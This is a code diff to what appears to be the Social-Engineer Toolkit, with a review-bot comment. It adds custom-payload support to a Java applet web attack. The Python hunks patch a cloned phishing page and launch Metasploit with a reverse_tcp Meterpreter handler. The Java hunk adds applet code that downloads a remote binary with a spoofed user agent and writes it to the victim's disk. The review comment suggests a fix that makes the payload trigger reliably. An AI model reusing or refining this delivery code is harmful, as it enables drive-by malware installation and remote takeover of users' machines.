except Exception, e:


@ -22,6 +22,23 @@ if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
data = data.replace('param name="8" value="YES"', 'param name="8" value="CUST"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), shell=True).wait()
# set current path
definepath=os.getcwd()
@ -493,14 +510,18 @@ try:
meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/%s" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
except: import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
if custom != 1:
child1=pexpect.spawn("%smsfconsole -r %s/%s" % (msf_path,setdir,meta_config))
# check if we want to deliver emails or track users that click the link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try: reload(src.phishing.smtp.client.smtp_web)
except: import src.phishing.smtp.client.smtp_web
child1.interact()
# if we arent using a custom payload
if custom != 1:
child1.interact()
if os.path.isfile(setdir + "/set.payload"):
port = check_options("PORT=")
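Review bot: The template rewrite at L661–L666 opens index.html for reading via `fileopen3 = fileopen = file(...)` and never closes it, and the replacement at L664 only matches `param name="8" value="YES"`: if the cloned page still carries value="NO" (written by the DEPLOY_BINARIES handling at L524 in create_payloads, unless the custom-payload block at L565–L570 has already forced it to YES), the marker is silently not set and the applet's `sixthParm.length() > 3` test never fires. Adding `data = data.replace('param name="8" value="NO"', 'param name="8" value="CUST"')` after the existing line and reading the file inside a `with` block would address both. The rendered page loses indentation, so it is not certain whether the WEBATTACK_EMAIL block (L683–L687) is now nested under `if custom != 1:`; if it is, e-mail delivery and click tracking are skipped for custom payloads, which the changelog does not mention. The enclosing `try:` block starts before this hunk.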



@ -410,7 +410,7 @@ if not os.path.isfile(setdir + "/template.zip"):
if not os.path.isfile(setdir + "/unc_config"):
print_error("Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"):
child=pexpect.spawn("ruby %s/msfconsole -L -r %s/unc_config" % (meta_path,setdir))
child=pexpect.spawn("%smsfconsole -L -r %s/unc_config" % (meta_path,setdir))
try: child.interact()
except Exception: child.close()
@ -430,7 +430,7 @@ if not os.path.isfile(setdir + "/template.zip"):
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
child=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (meta_path,setdir))
child=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
try:
child.interact()
except Exception:


@ -56,7 +56,7 @@ if powershell_menu_choice != "99":
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
print_status("Powershell files can be found under %s/reports/powershell/" % (setdir))
return_continue()


@ -133,7 +133,7 @@ if payload_counter == 1:
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (msf_path,setdir))
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (msf_path,setdir))
child1.interact()
except:
if operating_system != "windows":


@ -88,8 +88,9 @@ public class Java extends Applet {
if ( osType < 1 )
{
// here we check for powershel
// here we check for powershell
File file = new File("c:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe");
if (sixthParm.length() < 4) {
if (!file.exists()) {
// URL parameter
URL url = new URL(downParm);
@ -125,8 +126,56 @@ public class Java extends Applet {
out.flush();
out.close();
}
// }
}
}
if ( osType < 1 )
{
// This is if we are using a custom payload delivery
// CUSTOM PAYLOAD FOR WINDOWS HERE
// Boom.
// if sixth parameter is greater than yes, which is CUST, four characters then trigger on custom payload for download
if (sixthParm.length() > 3) {
// URL parameter
URL url = new URL(downParm);
// Open the conneciton
URLConnection hc = url.openConnection();
// set the user agent string
hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2");
// grab content type
String contentType = hc.getContentType();
// grab content length
int contentLength = hc.getContentLength();
// pull input stream
InputStream raw = hc.getInputStream();
// stream buffer into raw input stream
InputStream in = new BufferedInputStream(raw);
// write the bytes out
byte[] data = new byte[contentLength];
int bytesRead = 0;
int offset = 0;
while (offset < contentLength) {
bytesRead = in.read(data, offset, data.length - offset);
if (bytesRead == -1)
break;
offset += bytesRead;
}
// close it
in.close();
// write file out to pfad
String filename = url.getFile();
FileOutputStream out = new FileOutputStream(pfad);
// close everything out
out.write(data);
out.flush();
out.close();
}
//}
}
// download file all other OS
if ( osType > 1 ){